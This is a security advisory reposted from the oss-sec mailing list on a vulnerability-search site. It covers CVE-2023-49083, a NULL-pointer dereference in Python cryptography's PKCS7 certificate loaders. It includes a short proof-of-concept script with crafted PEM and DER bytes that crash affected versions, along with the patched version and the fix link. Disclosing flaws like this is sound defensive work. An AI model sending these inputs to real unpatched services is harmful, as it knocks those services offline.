Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Python Cryptography advisory: CVE-2023-49083 NULL-dereference when loading PKCS7 certificates

Related Vulnerabilities: CVE-2023-49083  
Source 
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->

oss-sec
mailing list archives
<!--X-User-Header-End-->
<!--X-TopPNI-->

By Date

By Thread

</form>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
Python Cryptography advisory: CVE-2023-49083 NULL-dereference when loading PKCS7 certificates

<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->

From: Alan Coopersmith &lt;alan.coopersmith () oracle com&gt;

Date: Wed, 29 Nov 2023 11:30:39 -0800

<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->

<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
https://github.com/pyca/cryptography/security/advisories/GHSA-jfhm-5ghh-2f97
reports:

-------------------------------------------------------------------------------
Affected versions &gt;= 3.1, &lt; 41.0.6
Patched versions &gt;=41.0.6

Summary

Calling load_pem_pkcs7_certificates or load_der_pkcs7_certificates could lead to 
a NULL-pointer dereference and segfault.
PoC

Here is a Python code that triggers the issue:

from cryptography.hazmat.primitives.serialization.pkcs7 import 
load_der_pkcs7_certificates, load_pem_pkcs7_certificates

pem_p7 = b"""
-----BEGIN PKCS7-----
MAsGCSqGSIb3DQEHAg==
-----END PKCS7-----
"""

der_p7 = b"\x30\x0B\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x07\x02"

load_pem_pkcs7_certificates(pem_p7)
load_der_pkcs7_certificates(der_p7)

Impact

Exploitation of this vulnerability poses a serious risk of Denial of Service 
(DoS) for any application attempting to deserialize a PKCS7 blob/certificate. 
The consequences extend to potential disruptions in system availability and 
stability.

-------------------------------------------------------------------------------

The fix was in https://github.com/pyca/cryptography/pull/9926

--
        -Alan Coopersmith-                 alan.coopersmith () oracle com
         Oracle Solaris Engineering - https://blogs.oracle.com/solaris

<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->

<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->

By Date

By Thread

Current thread:

Python Cryptography advisory: CVE-2023-49083 NULL-dereference when loading PKCS7 certificates Alan Coopersmith (Nov 29)

<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started